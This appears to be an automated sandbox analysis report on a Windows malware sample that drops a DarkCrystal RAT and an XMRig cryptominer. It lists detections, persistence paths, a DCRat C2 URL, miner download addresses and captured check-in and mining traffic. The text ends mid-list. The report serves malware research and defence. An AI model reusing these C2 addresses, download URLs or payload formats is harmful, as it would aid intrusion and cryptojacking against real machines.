                                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows/Bridgeprovider.exe", ParentImage: C:\Windows\Bridgeprovider.exe, ParentProcessId: 4144, ParentProcessName: Bridgeprovider.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", ProcessId: 5436, ProcessName: csc.exe

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-12-08T23:02:43.286483+010020480951A Network Trojan was detected192.168.2.449741193.32.162.6480TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Antivirus detection for dropped file
                                  Source: C:\Users\user\Desktop\UtDRkwHy.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\Users\user\Desktop\KbrUPpvT.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeAvira: detection malicious, Label: TR/ClipBanker.zcrtc
                                  Source: C:\Users\user\AppData\Local\Temp\EekRrdxVrk.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\Desktop\OShKWlwM.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                                  Source: C:\Users\user\Desktop\IIxTfkxV.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\Desktop\DmmmRJbk.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\Users\user\Desktop\QLwtIihK.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Found malware configuration
                                  Source: 00000041.00000002.2015361827.00000000137A7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://193.32.162.64/Linelow"}
                                  Multi AV Scanner detection for dropped file
                                  Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeReversingLabs: Detection: 39%
                                  Source: C:\Users\user\Desktop\AtXEfMql.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\IIxTfkxV.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\OIKLmzcP.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\QLwtIihK.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\brrRNKBn.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\fZypqYbb.logReversingLabs: Detection: 20%
                                  Source: C:\Users\user\Desktop\mFfXERcN.logReversingLabs: Detection: 29%
                                  Source: C:\Users\user\Desktop\quigFLkP.logReversingLabs: Detection: 20%
                                  Source: C:\Users\user\Desktop\sPPOvTaE.logReversingLabs: Detection: 29%
                                  Source: C:\Users\user\Desktop\syIwhxhC.logReversingLabs: Detection: 20%
                                  Source: C:\Users\user\Desktop\tvjECxvw.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\vrXfSuSA.logReversingLabs: Detection: 15%
                                  Source: C:\Windows\Bridgeprovider.exeReversingLabs: Detection: 63%
                                  Source: C:\Windows\INF\MicrosoftDefenger.exeReversingLabs: Detection: 63%
                                  Source: C:\Windows\Tasks\1.exeReversingLabs: Detection: 63%
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeReversingLabs: Detection: 62%
                                  Source: C:\Windows\Tasks\IntelConfigService.exeReversingLabs: Detection: 56%
                                  Source: C:\Windows\Tasks\MSTask.exeReversingLabs: Detection: 54%
                                  Source: C:\Windows\Tasks\MicrosoftPrt.exeReversingLabs: Detection: 39%
                                  Source: C:\Windows\Tasks\Superfetch.exeReversingLabs: Detection: 67%
                                  Source: C:\Windows\Tasks\Wmiic.exeReversingLabs: Detection: 73%
                                  Source: C:\Windows\Tasks\Wrap.exeReversingLabs: Detection: 65%
                                  Multi AV Scanner detection for submitted file
                                  Source: IYXE4Uz61k.exeReversingLabs: Detection: 34%
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                  Machine Learning detection for dropped file
                                  Source: C:\Users\user\Desktop\IZEltFrY.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\UtDRkwHy.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\KbrUPpvT.logJoe Sandbox ML: detected
                                  Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\OShKWlwM.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\DmmmRJbk.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\Aepdvrho.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\QLwtIihK.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\fZypqYbb.logJoe Sandbox ML: detected

                                  Bitcoin Miner

                                  barindex
                                  Yara detected Xmrig cryptocurrency miner
                                  Source: Yara matchFile source: dump.pcap, type: PCAP
                                  Source: Yara matchFile source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000035.00000003.1908378022.0000020033251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4148260496.00000200332C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000003.2249324527.000002003380A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000003.2249769366.00000200332C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4148260496.0000020033227000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4149570382.0000020033819000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4148260496.0000020033241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000003.2249324527.0000020033819000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4148260496.00000200331F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000003.1908406838.0000020033254000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: ApplicationsFrameHost.exe PID: 2044, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Tasks\config.json, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPED
                                  Detected Stratum mining protocol
                                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 185.17.0.139:81 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"your_wallet_address","pass":"x","agent":"xmrigcc/3.4.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","rx/yada","rx/lozz","rx/xdag","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider","ghostrider/mike"],"supports":["signing"]}}.
                                  Found strings related to Crypto-Mining
                                  Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: stratum+tcp://
                                  Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: cryptonight/0
                                  Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: stratum+tcp://
                                  Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                                  Source: IYXE4Uz61k.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: IYXE4Uz61k.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: IYXE4Uz61k.exe
                                  Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_queue.pdb source: MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: vcruntime140.amd64.pdbGCTL source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_ssl.pdb source: _ssl.pyd.56.dr
                                  Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\python3.pdb source: MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.pdb source: Bridgeprovider.exe, 00000041.00000002.2009860535.0000000003C3B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: MSTask.exe, 0000003E.00000002.4153223643.00007FFDFB243000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: MSTask.exe, 0000003E.00000002.4153223643.00007FFDFB243000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: MSTask.exe, 00000038.00000003.1927960487.00000286A4ACD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: kockv.pdb source: Bridgeprovider.exe, 00000041.00000002.2037973989.000000001BD19000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: vcruntime140.amd64.pdb source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmp

                                  Spreading

                                  barindex
                                  Infects executable files (exe, dll, sys, html)
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0087A69B
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0088C220
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0011A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,26_2_0011A69B
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,26_2_0012C220
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0C9E0 FindFirstFileExW,42_2_00007FF726D0C9E0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA8110 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,56_2_00007FF7B1DA8110
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1D97B80 FindFirstFileExW,FindClose,56_2_00007FF7B1D97B80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA8110 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,56_2_00007FF7B1DA8110
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB20D4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,56_2_00007FF7B1DB20D4
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,60_2_003EA69B
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,60_2_003FC220
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004462 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,62_2_00007FFDFB004462
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 4x nop then jmp 00007FFD9B002136h65_2_00007FFD9AFF087A
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh65_2_00007FFD9B19D5CD

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49741 -> 193.32.162.64:80
                                  Uses known network protocols on non-standard ports
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49739
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49740
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49742
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49744
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49752
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49773
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49795
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49820
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49842
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49863
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49888
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49909
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49930
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49951
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49972
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49999
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50021
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50028
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50030
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50033
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50035
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50038
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50040
                                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 185.17.0.139:81
                                  Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: global trafficHTTP traffic detected: GET /miners/v.txt HTTP/1.1Host: 45.137.64.40User-Agent: python-requests/2.28.1Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
                                  Source: unknownHTTP traffic detected: POST /client/setClientConfig?clientId=124406 HTTP/1.1Accept: *//*Accept: application/jsonAuthorization: Bearer mySecretConnection: closeContent-Length: 3462Content-Type: application/jsonHost: 185.17.0.139:8081User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                  Source: MSTask.exe, 0000003E.00000002.4151834766.00000268D2050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                                  Source: MSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/miners.txt
                                  Source: MSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/miners.txtindex
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/miners.txtz
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4152250837.00000268D2590000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149243495.00000268D17A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/v.txt
                                  Source: MSTask.exe, 0000003E.00000002.4149243495.00000268D17A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/v.txt_inspect.py?
                                  Source: MSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org/techtonik/python-pager
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1D2A000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org/techtonik/python-wget/
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 